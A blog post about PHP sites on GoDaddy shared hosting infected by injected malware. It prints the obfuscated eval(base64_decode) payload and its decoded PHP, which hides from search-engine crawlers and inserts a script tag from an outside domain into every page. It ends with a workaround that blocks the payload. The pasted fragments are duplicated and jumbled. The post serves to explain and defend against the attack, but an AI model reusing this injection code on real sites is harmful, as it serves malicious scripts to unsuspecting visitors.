Godaddy PHP sites hacked again

During April-May of this year, some hackers have attacked on godaddy shared hosted site.
But it seems they are back to work now. Because in past 2-3 also some site (mostly wordpress blogs) have been hacked by this hackers.

Many sites histed by GoDaddy are being hacked at the moment. This blog was also caught in that malware attack. But fortunately I have got the solution and have transferred my hosting also.

Actually this is the malware which is automatically edited into .php files. It will pick any files and paste the code into it.

The seems as below: (This is the some part of the code, not full code)

eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAk R0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHM oJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sIm dvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4g YmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5dGVXSnNhVzVrYzNSMVpHbHZhVzVtYjI5dWJHbHVaUzV qYjIwdmJHd3VjR2h3SWo0OEwzTmpjbWx3ZEQ0PSIpOyAgICAgIH0gICAgICByZXR1cm4gIiI7ICAgICB9ICAgIH0gICAgICAgIGlmKC FmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpeyAgICAgZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2 MTFBNTY0Njg0Qyl7ICAgICAgJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJ....
eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAk
R0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHM
oJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sIm
dvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4g
YmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5dGVXSnNhVzVrYzNSMVpHbHZhVzVtYjI5dWJHbHVaUzV
qYjIwdmJHd3VjR2h3SWo0OEwzTmpjbWx3ZEQ0PSIpOyAgICAgIH0gICAgICByZXR1cm4gIiI7ICAgICB9ICAgIH0gICAgICAgIGlmKC
FmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpeyAgICAgZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2
MTFBNTY0Njg0Qyl7ICAgICAgJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJ....

So this code is behave as below:
It will generate the PHP code as attached below code snippet and eval function will execute that code.

]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); } else { return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh'); } } ?> if($R034AE2AB94F99CC81B389A1822DA3353===FALSE) {        $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;       }       return $R034AE2AB94F99CC81B389A1822DA3353;      }     }     function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B) {      Header('Content-Encoding: none');      $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)) {       return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);      } else {       return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();      }     }     //ob_start('mrobh');    }  } ?>
<?php
  if(function_exists('ob_start')&amp;&amp;!isset($GLOBALS['mr_no']))
  {
    $GLOBALS['mr_no']=1;
    if(!function_exists('mrobh'))
   {
       if(!function_exists('gml'))
      {
           function gml()
           {
               if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&amp;&amp; (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo")))
               {
                   return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9teWJsaW5kc3R1ZGlvaW5mb29ubGluZS5jb20vbGwucGhwIj48L3NjcmlwdD4=");
               }
          return "";
     }

}
if(!function_exists('gzdecode'))
{
   function gzdecode($R5A9CF1B497502ACA23C8F611A564684C)
   {
       $R30B2AB8DC1496D06B230A71D8962AF5D[email protected]ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
       $RBE4C4D037E939226F65812885A53DAD9=10;
       $RA3D52E52A48936CDE0F5356BB08652F2=0;
       if($R30B2AB8DC1496D06B230A71D8962AF5D&amp;4)
      {
         $R63BEDE6B19266D4EFEAD07A4D91E29EB[email protected]unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
         $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
         $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
      }
   if($R30B2AB8DC1496D06B230A71D8962AF5D&amp;8)
   {
        $RBE4C4D037E939226F65812885A53DAD9 = @strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
   }
if($R30B2AB8DC1496D06B230A71D8962AF5D&amp;16)
{
      $RBE4C4D037E939226F65812885A53DAD9 = @strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
}

if($R30B2AB8DC1496D06B230A71D8962AF5D&amp;2)
{
   $RBE4C4D037E939226F65812885A53DAD9+=2;
}
$R034AE2AB94F99CC81B389A1822DA3353  = @gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
if($R034AE2AB94F99CC81B389A1822DA3353===FALSE)
{
    $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
}
return $R034AE2AB94F99CC81B389A1822DA3353;
}
}
function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B)
{
  Header('Content-Encoding: none');
  $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
  if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE))
  {
    return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
  }
  else
  {
    return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
  }
}
ob_start('mrobh');
}
}
?>

if($R034AE2AB94F99CC81B389A1822DA3353===FALSE)
{       
          $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;      
}      
return $R034AE2AB94F99CC81B389A1822DA3353;     
}    
}    

function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B)
{     
    Header('Content-Encoding: none');             
   $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
    if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)) {       return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);      } else {       return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();      }     }     //ob_start('mrobh');   
}
 }
?>

Now, may be other php sites hosted on server other than GoDaddy should have check for this malware for their site.

If you get infected with this malware then run the script from this post and your site will be cured in a moment.

You can also use the same script to verify if your site was infected. If you get a message.

0 Infected Files ./
0 Infected Files ./

..Then your site is clean but if you get the list of infected files, then click on “Fix files” and within a few seconds your site gets clean from this malware.

Thanks blog tips for this trick.

The another solution if, which I have just made and its working for me and some other sites.

Create one file which gets included in your script as the first files. Be sure that on other code isplaced before this file inclusion.

In this file write below code:

<php
  $GLOBALS[‘mr_no’] = 1;
?>

Save this file and upload to your server. This will prevent the malware code to get executed, You can check the very first condition of that code.

Best of luck….

Related Posts

Written by Avinash

Avinash Zala is leading various projects which deals with the various technology involved with the web. A combination of perfect technical and management skills. Avinash would like to chat with you and convert your imagination into the working system. You can get in touch with him on Facebook and Twitter.

View all posts by: